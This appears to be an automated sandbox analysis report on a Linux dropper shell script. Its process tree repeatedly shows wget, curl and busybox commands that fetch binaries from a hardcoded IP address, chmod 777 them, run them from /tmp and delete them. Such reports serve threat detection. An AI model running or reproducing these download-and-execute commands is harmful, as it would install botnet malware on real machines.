Analysis
-
max time kernel
28s -
max time network
129s -
platform
ubuntu-18.04_amd64 -
resource
ubuntu1804-amd64-20240508-en -
resource tags
arch:amd64arch:i386image:ubuntu1804-amd64-20240508-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system -
submitted
24/11/2024, 01:07
Static task
static1
Behavioral task
behavioral1
Sample
d0825b48bf28e63aff59de6fc1435a10a0e1c09d3c6a677363f644feceb525ce.sh
Resource
ubuntu1804-amd64-20240508-en
Behavioral task
behavioral2
Sample
d0825b48bf28e63aff59de6fc1435a10a0e1c09d3c6a677363f644feceb525ce.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
d0825b48bf28e63aff59de6fc1435a10a0e1c09d3c6a677363f644feceb525ce.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
d0825b48bf28e63aff59de6fc1435a10a0e1c09d3c6a677363f644feceb525ce.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
d0825b48bf28e63aff59de6fc1435a10a0e1c09d3c6a677363f644feceb525ce.sh
-
Size
10KB
-
MD5
26f371cd3359d8f6a45ccc544288c804
-
SHA1
35bd60ad220991f844f9862e522418bc05563390
-
SHA256
d0825b48bf28e63aff59de6fc1435a10a0e1c09d3c6a677363f644feceb525ce
-
SHA512
2729bf8db10105d916290630952e3067a9f8f09aa7ae41abbe4ba4b44d26b55872829cbe0a605d526abae197a6dafb93ee254f30ac20bf7ce04bea8b41cb3ef0
-
SSDEEP
192:k47/XwgW6ozLldOY4Z6zJnzLldOYZM7/Xwg+w:kN5zLlcY4Z6zJnzLlcY3w
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 1619 chmod 1649 chmod 1613 chmod 1625 chmod 1655 chmod 1667 chmod 1679 chmod 1685 chmod 1553 chmod 1637 chmod 1643 chmod 1607 chmod 1547 chmod 1673 chmod 1523 chmod 1583 chmod 1601 chmod 1535 chmod 1541 chmod 1565 chmod 1571 chmod 1631 chmod 1529 chmod 1577 chmod 1589 chmod 1595 chmod 1661 chmod 1559 chmod -
Executes dropped EXE 28 IoCs
ioc pid Process /tmp/wXJFdpXJuaEFyrrqm7fgJi8cWMLoaMcijy 1524 wXJFdpXJuaEFyrrqm7fgJi8cWMLoaMcijy /tmp/F6QRmPx1bJ8meVCDnUDTeQmM4AnEsPAJH4 1530 F6QRmPx1bJ8meVCDnUDTeQmM4AnEsPAJH4 /tmp/BewxJ80b8Z0sWNfOvVrkimZxwdlyAtpQat 1536 BewxJ80b8Z0sWNfOvVrkimZxwdlyAtpQat /tmp/vib0DUNx3N9TmMKw41R3vT34M9k1LpCB6c 1542 vib0DUNx3N9TmMKw41R3vT34M9k1LpCB6c /tmp/93JQo5tpx9IxONU5tx3TmUNbMyN7DwV21E 1548 93JQo5tpx9IxONU5tx3TmUNbMyN7DwV21E /tmp/iQArRmyWEu9TrycExH8PaE1szm3DaBah0y 1554 iQArRmyWEu9TrycExH8PaE1szm3DaBah0y /tmp/Lo46YywIia327erXTugKxcchWtLwMJPGmT 1560 Lo46YywIia327erXTugKxcchWtLwMJPGmT /tmp/TOd8GxM5d6WZkJ4J2go9miNtLCG5mALWV0 1566 TOd8GxM5d6WZkJ4J2go9miNtLCG5mALWV0 /tmp/KUVkMsD5wG4j4z1Bx1Y5FQBxyo4EvCKTBB 1572 KUVkMsD5wG4j4z1Bx1Y5FQBxyo4EvCKTBB /tmp/05g8tl5L6HfMYWfG7lPLQFA2SlSRHbQLbR 1578 05g8tl5L6HfMYWfG7lPLQFA2SlSRHbQLbR /tmp/jDTKQ8um0gYbQFShCsXMC5oLmPNTi4iiF5 1584 jDTKQ8um0gYbQFShCsXMC5oLmPNTi4iiF5 /tmp/nuEVO1QegCoovHpY61ekJXJBAyFxmyuHey 1590 nuEVO1QegCoovHpY61ekJXJBAyFxmyuHey /tmp/qtAWt3ffqmVAJReWltBuxMyvGR7BzvPw9O 1596 qtAWt3ffqmVAJReWltBuxMyvGR7BzvPw9O /tmp/pfoXEv7S9cabglYvf9QktOtJq9zr7hEAs5 1602 pfoXEv7S9cabglYvf9QktOtJq9zr7hEAs5 /tmp/93JQo5tpx9IxONU5tx3TmUNbMyN7DwV21E 1608 93JQo5tpx9IxONU5tx3TmUNbMyN7DwV21E /tmp/iQArRmyWEu9TrycExH8PaE1szm3DaBah0y 1614 iQArRmyWEu9TrycExH8PaE1szm3DaBah0y /tmp/Lo46YywIia327erXTugKxcchWtLwMJPGmT 1620 Lo46YywIia327erXTugKxcchWtLwMJPGmT /tmp/TOd8GxM5d6WZkJ4J2go9miNtLCG5mALWV0 1626 TOd8GxM5d6WZkJ4J2go9miNtLCG5mALWV0 /tmp/vib0DUNx3N9TmMKw41R3vT34M9k1LpCB6c 1632 vib0DUNx3N9TmMKw41R3vT34M9k1LpCB6c /tmp/05g8tl5L6HfMYWfG7lPLQFA2SlSRHbQLbR 1638 05g8tl5L6HfMYWfG7lPLQFA2SlSRHbQLbR /tmp/jDTKQ8um0gYbQFShCsXMC5oLmPNTi4iiF5 1644 jDTKQ8um0gYbQFShCsXMC5oLmPNTi4iiF5 /tmp/KUVkMsD5wG4j4z1Bx1Y5FQBxyo4EvCKTBB 1650 KUVkMsD5wG4j4z1Bx1Y5FQBxyo4EvCKTBB /tmp/qtAWt3ffqmVAJReWltBuxMyvGR7BzvPw9O 1656 qtAWt3ffqmVAJReWltBuxMyvGR7BzvPw9O /tmp/pfoXEv7S9cabglYvf9QktOtJq9zr7hEAs5 1662 pfoXEv7S9cabglYvf9QktOtJq9zr7hEAs5 /tmp/nuEVO1QegCoovHpY61ekJXJBAyFxmyuHey 1668 nuEVO1QegCoovHpY61ekJXJBAyFxmyuHey /tmp/F6QRmPx1bJ8meVCDnUDTeQmM4AnEsPAJH4 1674 F6QRmPx1bJ8meVCDnUDTeQmM4AnEsPAJH4 /tmp/BewxJ80b8Z0sWNfOvVrkimZxwdlyAtpQat 1680 BewxJ80b8Z0sWNfOvVrkimZxwdlyAtpQat /tmp/wXJFdpXJuaEFyrrqm7fgJi8cWMLoaMcijy 1686 wXJFdpXJuaEFyrrqm7fgJi8cWMLoaMcijy -
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/Lo46YywIia327erXTugKxcchWtLwMJPGmT curl File opened for modification /tmp/F6QRmPx1bJ8meVCDnUDTeQmM4AnEsPAJH4 curl File opened for modification /tmp/F6QRmPx1bJ8meVCDnUDTeQmM4AnEsPAJH4 curl File opened for modification /tmp/KUVkMsD5wG4j4z1Bx1Y5FQBxyo4EvCKTBB curl File opened for modification /tmp/nuEVO1QegCoovHpY61ekJXJBAyFxmyuHey curl File opened for modification /tmp/qtAWt3ffqmVAJReWltBuxMyvGR7BzvPw9O curl File opened for modification /tmp/pfoXEv7S9cabglYvf9QktOtJq9zr7hEAs5 curl File opened for modification /tmp/BewxJ80b8Z0sWNfOvVrkimZxwdlyAtpQat curl File opened for modification /tmp/jDTKQ8um0gYbQFShCsXMC5oLmPNTi4iiF5 curl File opened for modification /tmp/iQArRmyWEu9TrycExH8PaE1szm3DaBah0y curl File opened for modification /tmp/qtAWt3ffqmVAJReWltBuxMyvGR7BzvPw9O curl File opened for modification /tmp/vib0DUNx3N9TmMKw41R3vT34M9k1LpCB6c curl File opened for modification /tmp/Lo46YywIia327erXTugKxcchWtLwMJPGmT curl File opened for modification /tmp/TOd8GxM5d6WZkJ4J2go9miNtLCG5mALWV0 curl File opened for modification /tmp/05g8tl5L6HfMYWfG7lPLQFA2SlSRHbQLbR curl File opened for modification /tmp/93JQo5tpx9IxONU5tx3TmUNbMyN7DwV21E curl File opened for modification /tmp/iQArRmyWEu9TrycExH8PaE1szm3DaBah0y curl File opened for modification /tmp/KUVkMsD5wG4j4z1Bx1Y5FQBxyo4EvCKTBB curl File opened for modification /tmp/BewxJ80b8Z0sWNfOvVrkimZxwdlyAtpQat curl File opened for modification /tmp/wXJFdpXJuaEFyrrqm7fgJi8cWMLoaMcijy curl File opened for modification /tmp/wXJFdpXJuaEFyrrqm7fgJi8cWMLoaMcijy curl File opened for modification /tmp/vib0DUNx3N9TmMKw41R3vT34M9k1LpCB6c curl File opened for modification /tmp/TOd8GxM5d6WZkJ4J2go9miNtLCG5mALWV0 curl File opened for modification /tmp/jDTKQ8um0gYbQFShCsXMC5oLmPNTi4iiF5 curl File opened for modification /tmp/pfoXEv7S9cabglYvf9QktOtJq9zr7hEAs5 curl File opened for modification /tmp/05g8tl5L6HfMYWfG7lPLQFA2SlSRHbQLbR curl File opened for modification /tmp/nuEVO1QegCoovHpY61ekJXJBAyFxmyuHey curl File opened for modification /tmp/93JQo5tpx9IxONU5tx3TmUNbMyN7DwV21E curl
Processes
-
/tmp/d0825b48bf28e63aff59de6fc1435a10a0e1c09d3c6a677363f644feceb525ce.sh/tmp/d0825b48bf28e63aff59de6fc1435a10a0e1c09d3c6a677363f644feceb525ce.sh1⤵PID:1515
-
/bin/rm/bin/rm bins.sh2⤵PID:1516
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/wXJFdpXJuaEFyrrqm7fgJi8cWMLoaMcijy2⤵PID:1517
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/wXJFdpXJuaEFyrrqm7fgJi8cWMLoaMcijy2⤵
- Writes file to tmp directory
PID:1521
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/wXJFdpXJuaEFyrrqm7fgJi8cWMLoaMcijy2⤵PID:1522
-
-
/bin/chmodchmod 777 wXJFdpXJuaEFyrrqm7fgJi8cWMLoaMcijy2⤵
- File and Directory Permissions Modification
PID:1523
-
-
/tmp/wXJFdpXJuaEFyrrqm7fgJi8cWMLoaMcijy./wXJFdpXJuaEFyrrqm7fgJi8cWMLoaMcijy2⤵
- Executes dropped EXE
PID:1524
-
-
/bin/rmrm wXJFdpXJuaEFyrrqm7fgJi8cWMLoaMcijy2⤵PID:1525
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/F6QRmPx1bJ8meVCDnUDTeQmM4AnEsPAJH42⤵PID:1526
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/F6QRmPx1bJ8meVCDnUDTeQmM4AnEsPAJH42⤵
- Writes file to tmp directory
PID:1527
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/F6QRmPx1bJ8meVCDnUDTeQmM4AnEsPAJH42⤵PID:1528
-
-
/bin/chmodchmod 777 F6QRmPx1bJ8meVCDnUDTeQmM4AnEsPAJH42⤵
- File and Directory Permissions Modification
PID:1529
-
-
/tmp/F6QRmPx1bJ8meVCDnUDTeQmM4AnEsPAJH4./F6QRmPx1bJ8meVCDnUDTeQmM4AnEsPAJH42⤵
- Executes dropped EXE
PID:1530
-
-
/bin/rmrm F6QRmPx1bJ8meVCDnUDTeQmM4AnEsPAJH42⤵PID:1531
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/BewxJ80b8Z0sWNfOvVrkimZxwdlyAtpQat2⤵PID:1532
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/BewxJ80b8Z0sWNfOvVrkimZxwdlyAtpQat2⤵
- Writes file to tmp directory
PID:1533
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/BewxJ80b8Z0sWNfOvVrkimZxwdlyAtpQat2⤵PID:1534
-
-
/bin/chmodchmod 777 BewxJ80b8Z0sWNfOvVrkimZxwdlyAtpQat2⤵
- File and Directory Permissions Modification
PID:1535
-
-
/tmp/BewxJ80b8Z0sWNfOvVrkimZxwdlyAtpQat./BewxJ80b8Z0sWNfOvVrkimZxwdlyAtpQat2⤵
- Executes dropped EXE
PID:1536
-
-
/bin/rmrm BewxJ80b8Z0sWNfOvVrkimZxwdlyAtpQat2⤵PID:1537
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/vib0DUNx3N9TmMKw41R3vT34M9k1LpCB6c2⤵PID:1538
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/vib0DUNx3N9TmMKw41R3vT34M9k1LpCB6c2⤵
- Writes file to tmp directory
PID:1539
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/vib0DUNx3N9TmMKw41R3vT34M9k1LpCB6c2⤵PID:1540
-
-
/bin/chmodchmod 777 vib0DUNx3N9TmMKw41R3vT34M9k1LpCB6c2⤵
- File and Directory Permissions Modification
PID:1541
-
-
/tmp/vib0DUNx3N9TmMKw41R3vT34M9k1LpCB6c./vib0DUNx3N9TmMKw41R3vT34M9k1LpCB6c2⤵
- Executes dropped EXE
PID:1542
-
-
/bin/rmrm vib0DUNx3N9TmMKw41R3vT34M9k1LpCB6c2⤵PID:1543
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/93JQo5tpx9IxONU5tx3TmUNbMyN7DwV21E2⤵PID:1544
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/93JQo5tpx9IxONU5tx3TmUNbMyN7DwV21E2⤵
- Writes file to tmp directory
PID:1545
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/93JQo5tpx9IxONU5tx3TmUNbMyN7DwV21E2⤵PID:1546
-
-
/bin/chmodchmod 777 93JQo5tpx9IxONU5tx3TmUNbMyN7DwV21E2⤵
- File and Directory Permissions Modification
PID:1547
-
-
/tmp/93JQo5tpx9IxONU5tx3TmUNbMyN7DwV21E./93JQo5tpx9IxONU5tx3TmUNbMyN7DwV21E2⤵
- Executes dropped EXE
PID:1548
-
-
/bin/rmrm 93JQo5tpx9IxONU5tx3TmUNbMyN7DwV21E2⤵PID:1549
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/iQArRmyWEu9TrycExH8PaE1szm3DaBah0y2⤵PID:1550
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/iQArRmyWEu9TrycExH8PaE1szm3DaBah0y2⤵
- Writes file to tmp directory
PID:1551
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/iQArRmyWEu9TrycExH8PaE1szm3DaBah0y2⤵PID:1552
-
-
/bin/chmodchmod 777 iQArRmyWEu9TrycExH8PaE1szm3DaBah0y2⤵
- File and Directory Permissions Modification
PID:1553
-
-
/tmp/iQArRmyWEu9TrycExH8PaE1szm3DaBah0y./iQArRmyWEu9TrycExH8PaE1szm3DaBah0y2⤵
- Executes dropped EXE
PID:1554
-
-
/bin/rmrm iQArRmyWEu9TrycExH8PaE1szm3DaBah0y2⤵PID:1555
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/Lo46YywIia327erXTugKxcchWtLwMJPGmT2⤵PID:1556
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/Lo46YywIia327erXTugKxcchWtLwMJPGmT2⤵
- Writes file to tmp directory
PID:1557
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/Lo46YywIia327erXTugKxcchWtLwMJPGmT2⤵PID:1558
-
-
/bin/chmodchmod 777 Lo46YywIia327erXTugKxcchWtLwMJPGmT2⤵
- File and Directory Permissions Modification
PID:1559
-
-
/tmp/Lo46YywIia327erXTugKxcchWtLwMJPGmT./Lo46YywIia327erXTugKxcchWtLwMJPGmT2⤵
- Executes dropped EXE
PID:1560
-
-
/bin/rmrm Lo46YywIia327erXTugKxcchWtLwMJPGmT2⤵PID:1561
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/TOd8GxM5d6WZkJ4J2go9miNtLCG5mALWV02⤵PID:1562
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/TOd8GxM5d6WZkJ4J2go9miNtLCG5mALWV02⤵
- Writes file to tmp directory
PID:1563
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/TOd8GxM5d6WZkJ4J2go9miNtLCG5mALWV02⤵PID:1564
-
-
/bin/chmodchmod 777 TOd8GxM5d6WZkJ4J2go9miNtLCG5mALWV02⤵
- File and Directory Permissions Modification
PID:1565
-
-
/tmp/TOd8GxM5d6WZkJ4J2go9miNtLCG5mALWV0./TOd8GxM5d6WZkJ4J2go9miNtLCG5mALWV02⤵
- Executes dropped EXE
PID:1566
-
-
/bin/rmrm TOd8GxM5d6WZkJ4J2go9miNtLCG5mALWV02⤵PID:1567
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/KUVkMsD5wG4j4z1Bx1Y5FQBxyo4EvCKTBB2⤵PID:1568
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/KUVkMsD5wG4j4z1Bx1Y5FQBxyo4EvCKTBB2⤵
- Writes file to tmp directory
PID:1569
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/KUVkMsD5wG4j4z1Bx1Y5FQBxyo4EvCKTBB2⤵PID:1570
-
-
/bin/chmodchmod 777 KUVkMsD5wG4j4z1Bx1Y5FQBxyo4EvCKTBB2⤵
- File and Directory Permissions Modification
PID:1571
-
-
/tmp/KUVkMsD5wG4j4z1Bx1Y5FQBxyo4EvCKTBB./KUVkMsD5wG4j4z1Bx1Y5FQBxyo4EvCKTBB2⤵
- Executes dropped EXE
PID:1572
-
-
/bin/rmrm KUVkMsD5wG4j4z1Bx1Y5FQBxyo4EvCKTBB2⤵PID:1573
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/05g8tl5L6HfMYWfG7lPLQFA2SlSRHbQLbR2⤵PID:1574
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/05g8tl5L6HfMYWfG7lPLQFA2SlSRHbQLbR2⤵
- Writes file to tmp directory
PID:1575
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/05g8tl5L6HfMYWfG7lPLQFA2SlSRHbQLbR2⤵PID:1576
-
-
/bin/chmodchmod 777 05g8tl5L6HfMYWfG7lPLQFA2SlSRHbQLbR2⤵
- File and Directory Permissions Modification
PID:1577
-
-
/tmp/05g8tl5L6HfMYWfG7lPLQFA2SlSRHbQLbR./05g8tl5L6HfMYWfG7lPLQFA2SlSRHbQLbR2⤵
- Executes dropped EXE
PID:1578
-
-
/bin/rmrm 05g8tl5L6HfMYWfG7lPLQFA2SlSRHbQLbR2⤵PID:1579
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/jDTKQ8um0gYbQFShCsXMC5oLmPNTi4iiF52⤵PID:1580
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/jDTKQ8um0gYbQFShCsXMC5oLmPNTi4iiF52⤵
- Writes file to tmp directory
PID:1581
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/jDTKQ8um0gYbQFShCsXMC5oLmPNTi4iiF52⤵PID:1582
-
-
/bin/chmodchmod 777 jDTKQ8um0gYbQFShCsXMC5oLmPNTi4iiF52⤵
- File and Directory Permissions Modification
PID:1583
-
-
/tmp/jDTKQ8um0gYbQFShCsXMC5oLmPNTi4iiF5./jDTKQ8um0gYbQFShCsXMC5oLmPNTi4iiF52⤵
- Executes dropped EXE
PID:1584
-
-
/bin/rmrm jDTKQ8um0gYbQFShCsXMC5oLmPNTi4iiF52⤵PID:1585
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/nuEVO1QegCoovHpY61ekJXJBAyFxmyuHey2⤵PID:1586
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/nuEVO1QegCoovHpY61ekJXJBAyFxmyuHey2⤵
- Writes file to tmp directory
PID:1587
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/nuEVO1QegCoovHpY61ekJXJBAyFxmyuHey2⤵PID:1588
-
-
/bin/chmodchmod 777 nuEVO1QegCoovHpY61ekJXJBAyFxmyuHey2⤵
- File and Directory Permissions Modification
PID:1589
-
-
/tmp/nuEVO1QegCoovHpY61ekJXJBAyFxmyuHey./nuEVO1QegCoovHpY61ekJXJBAyFxmyuHey2⤵
- Executes dropped EXE
PID:1590
-
-
/bin/rmrm nuEVO1QegCoovHpY61ekJXJBAyFxmyuHey2⤵PID:1591
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/qtAWt3ffqmVAJReWltBuxMyvGR7BzvPw9O2⤵PID:1592
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/qtAWt3ffqmVAJReWltBuxMyvGR7BzvPw9O2⤵
- Writes file to tmp directory
PID:1593
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/qtAWt3ffqmVAJReWltBuxMyvGR7BzvPw9O2⤵PID:1594
-
-
/bin/chmodchmod 777 qtAWt3ffqmVAJReWltBuxMyvGR7BzvPw9O2⤵
- File and Directory Permissions Modification
PID:1595
-
-
/tmp/qtAWt3ffqmVAJReWltBuxMyvGR7BzvPw9O./qtAWt3ffqmVAJReWltBuxMyvGR7BzvPw9O2⤵
- Executes dropped EXE
PID:1596
-
-
/bin/rmrm qtAWt3ffqmVAJReWltBuxMyvGR7BzvPw9O2⤵PID:1597
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/pfoXEv7S9cabglYvf9QktOtJq9zr7hEAs52⤵PID:1598
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/pfoXEv7S9cabglYvf9QktOtJq9zr7hEAs52⤵
- Writes file to tmp directory
PID:1599
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/pfoXEv7S9cabglYvf9QktOtJq9zr7hEAs52⤵PID:1600
-
-
/bin/chmodchmod 777 pfoXEv7S9cabglYvf9QktOtJq9zr7hEAs52⤵
- File and Directory Permissions Modification
PID:1601
-
-
/tmp/pfoXEv7S9cabglYvf9QktOtJq9zr7hEAs5./pfoXEv7S9cabglYvf9QktOtJq9zr7hEAs52⤵
- Executes dropped EXE
PID:1602
-
-
/bin/rmrm pfoXEv7S9cabglYvf9QktOtJq9zr7hEAs52⤵PID:1603
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/93JQo5tpx9IxONU5tx3TmUNbMyN7DwV21E2⤵PID:1604
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/93JQo5tpx9IxONU5tx3TmUNbMyN7DwV21E2⤵
- Writes file to tmp directory
PID:1605
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/93JQo5tpx9IxONU5tx3TmUNbMyN7DwV21E2⤵PID:1606
-
-
/bin/chmodchmod 777 93JQo5tpx9IxONU5tx3TmUNbMyN7DwV21E2⤵
- File and Directory Permissions Modification
PID:1607
-
-
/tmp/93JQo5tpx9IxONU5tx3TmUNbMyN7DwV21E./93JQo5tpx9IxONU5tx3TmUNbMyN7DwV21E2⤵
- Executes dropped EXE
PID:1608
-
-
/bin/rmrm 93JQo5tpx9IxONU5tx3TmUNbMyN7DwV21E2⤵PID:1609
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/iQArRmyWEu9TrycExH8PaE1szm3DaBah0y2⤵PID:1610
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/iQArRmyWEu9TrycExH8PaE1szm3DaBah0y2⤵
- Writes file to tmp directory
PID:1611
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/iQArRmyWEu9TrycExH8PaE1szm3DaBah0y2⤵PID:1612
-
-
/bin/chmodchmod 777 iQArRmyWEu9TrycExH8PaE1szm3DaBah0y2⤵
- File and Directory Permissions Modification
PID:1613
-
-
/tmp/iQArRmyWEu9TrycExH8PaE1szm3DaBah0y./iQArRmyWEu9TrycExH8PaE1szm3DaBah0y2⤵
- Executes dropped EXE
PID:1614
-
-
/bin/rmrm iQArRmyWEu9TrycExH8PaE1szm3DaBah0y2⤵PID:1615
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/Lo46YywIia327erXTugKxcchWtLwMJPGmT2⤵PID:1616
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/Lo46YywIia327erXTugKxcchWtLwMJPGmT2⤵
- Writes file to tmp directory
PID:1617
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/Lo46YywIia327erXTugKxcchWtLwMJPGmT2⤵PID:1618
-
-
/bin/chmodchmod 777 Lo46YywIia327erXTugKxcchWtLwMJPGmT2⤵
- File and Directory Permissions Modification
PID:1619
-
-
/tmp/Lo46YywIia327erXTugKxcchWtLwMJPGmT./Lo46YywIia327erXTugKxcchWtLwMJPGmT2⤵
- Executes dropped EXE
PID:1620
-
-
/bin/rmrm Lo46YywIia327erXTugKxcchWtLwMJPGmT2⤵PID:1621
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/TOd8GxM5d6WZkJ4J2go9miNtLCG5mALWV02⤵PID:1622
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/TOd8GxM5d6WZkJ4J2go9miNtLCG5mALWV02⤵
- Writes file to tmp directory
PID:1623
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/TOd8GxM5d6WZkJ4J2go9miNtLCG5mALWV02⤵PID:1624
-
-
/bin/chmodchmod 777 TOd8GxM5d6WZkJ4J2go9miNtLCG5mALWV02⤵
- File and Directory Permissions Modification
PID:1625
-
-
/tmp/TOd8GxM5d6WZkJ4J2go9miNtLCG5mALWV0./TOd8GxM5d6WZkJ4J2go9miNtLCG5mALWV02⤵
- Executes dropped EXE
PID:1626
-
-
/bin/rmrm TOd8GxM5d6WZkJ4J2go9miNtLCG5mALWV02⤵PID:1627
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/vib0DUNx3N9TmMKw41R3vT34M9k1LpCB6c2⤵PID:1628
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/vib0DUNx3N9TmMKw41R3vT34M9k1LpCB6c2⤵
- Writes file to tmp directory
PID:1629
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/vib0DUNx3N9TmMKw41R3vT34M9k1LpCB6c2⤵PID:1630
-
-
/bin/chmodchmod 777 vib0DUNx3N9TmMKw41R3vT34M9k1LpCB6c2⤵
- File and Directory Permissions Modification
PID:1631
-
-
/tmp/vib0DUNx3N9TmMKw41R3vT34M9k1LpCB6c./vib0DUNx3N9TmMKw41R3vT34M9k1LpCB6c2⤵
- Executes dropped EXE
PID:1632
-
-
/bin/rmrm vib0DUNx3N9TmMKw41R3vT34M9k1LpCB6c2⤵PID:1633
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/05g8tl5L6HfMYWfG7lPLQFA2SlSRHbQLbR2⤵PID:1634
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/05g8tl5L6HfMYWfG7lPLQFA2SlSRHbQLbR2⤵
- Writes file to tmp directory
PID:1635
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/05g8tl5L6HfMYWfG7lPLQFA2SlSRHbQLbR2⤵PID:1636
-
-
/bin/chmodchmod 777 05g8tl5L6HfMYWfG7lPLQFA2SlSRHbQLbR2⤵
- File and Directory Permissions Modification
PID:1637
-
-
/tmp/05g8tl5L6HfMYWfG7lPLQFA2SlSRHbQLbR./05g8tl5L6HfMYWfG7lPLQFA2SlSRHbQLbR2⤵
- Executes dropped EXE
PID:1638
-
-
/bin/rmrm 05g8tl5L6HfMYWfG7lPLQFA2SlSRHbQLbR2⤵PID:1639
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/jDTKQ8um0gYbQFShCsXMC5oLmPNTi4iiF52⤵PID:1640
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/jDTKQ8um0gYbQFShCsXMC5oLmPNTi4iiF52⤵
- Writes file to tmp directory
PID:1641
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/jDTKQ8um0gYbQFShCsXMC5oLmPNTi4iiF52⤵PID:1642
-
-
/bin/chmodchmod 777 jDTKQ8um0gYbQFShCsXMC5oLmPNTi4iiF52⤵
- File and Directory Permissions Modification
PID:1643
-
-
/tmp/jDTKQ8um0gYbQFShCsXMC5oLmPNTi4iiF5./jDTKQ8um0gYbQFShCsXMC5oLmPNTi4iiF52⤵
- Executes dropped EXE
PID:1644
-
-
/bin/rmrm jDTKQ8um0gYbQFShCsXMC5oLmPNTi4iiF52⤵PID:1645
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/KUVkMsD5wG4j4z1Bx1Y5FQBxyo4EvCKTBB2⤵PID:1646
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/KUVkMsD5wG4j4z1Bx1Y5FQBxyo4EvCKTBB2⤵
- Writes file to tmp directory
PID:1647
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/KUVkMsD5wG4j4z1Bx1Y5FQBxyo4EvCKTBB2⤵PID:1648
-
-
/bin/chmodchmod 777 KUVkMsD5wG4j4z1Bx1Y5FQBxyo4EvCKTBB2⤵
- File and Directory Permissions Modification
PID:1649
-
-
/tmp/KUVkMsD5wG4j4z1Bx1Y5FQBxyo4EvCKTBB./KUVkMsD5wG4j4z1Bx1Y5FQBxyo4EvCKTBB2⤵
- Executes dropped EXE
PID:1650
-
-
/bin/rmrm KUVkMsD5wG4j4z1Bx1Y5FQBxyo4EvCKTBB2⤵PID:1651
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/qtAWt3ffqmVAJReWltBuxMyvGR7BzvPw9O2⤵PID:1652
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/qtAWt3ffqmVAJReWltBuxMyvGR7BzvPw9O2⤵
- Writes file to tmp directory
PID:1653
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/qtAWt3ffqmVAJReWltBuxMyvGR7BzvPw9O2⤵PID:1654
-
-
/bin/chmodchmod 777 qtAWt3ffqmVAJReWltBuxMyvGR7BzvPw9O2⤵
- File and Directory Permissions Modification
PID:1655
-
-
/tmp/qtAWt3ffqmVAJReWltBuxMyvGR7BzvPw9O./qtAWt3ffqmVAJReWltBuxMyvGR7BzvPw9O2⤵
- Executes dropped EXE
PID:1656
-
-
